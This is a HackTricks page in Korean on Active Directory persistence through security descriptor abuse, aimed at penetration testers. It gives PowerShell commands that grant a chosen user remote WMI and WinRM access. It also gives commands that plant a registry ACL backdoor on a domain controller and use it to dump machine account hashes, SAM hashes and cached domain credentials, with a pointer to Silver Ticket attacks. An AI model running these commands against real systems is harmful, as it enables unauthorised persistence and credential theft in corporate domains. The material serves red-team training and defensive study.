hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

5.3 KiB
Raw Blame History

보안 설명자

{% hint style="success" %} AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기
{% endhint %}

보안 설명자

문서에서: 보안 설명자 정의 언어(SDDL)는 보안 설명자를 설명하는 데 사용되는 형식을 정의합니다. SDDL은 DACL 및 SACL에 대해 ACE 문자열을 사용합니다: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

보안 설명자객체객체에 대해 가진 권한저장하는 데 사용됩니다. 객체의 보안 설명자에서 조금만 변경하면, 특권 그룹의 구성원이 될 필요 없이 해당 객체에 대한 매우 흥미로운 권한을 얻을 수 있습니다.

따라서 이 지속성 기술은 특정 객체에 대해 필요한 모든 권한을 얻는 능력을 기반으로 하며, 일반적으로 관리자 권한이 필요한 작업을 수행할 수 있지만 관리자일 필요는 없습니다.

WMI 접근

사용자에게 원격 WMI 실행 권한을 부여할 수 있습니다 이 방법을 사용하여:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

사용자에게 winrm PS 콘솔에 대한 액세스 제공 이것을 사용하여:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

해시 원격 접근

레지스트리에 접근하고 해시 덤프를 생성하여 Reg 백도어를 사용하여 DAMP, 언제든지 컴퓨터의 해시, SAM 및 컴퓨터의 모든 캐시된 AD 자격 증명을 검색할 수 있습니다. 따라서, 이는 도메인 컨트롤러 컴퓨터에 대한 일반 사용자에게 이 권한을 부여하는 데 매우 유용합니다:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets to learn how you could use the hash of the computer account of a Domain Controller.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}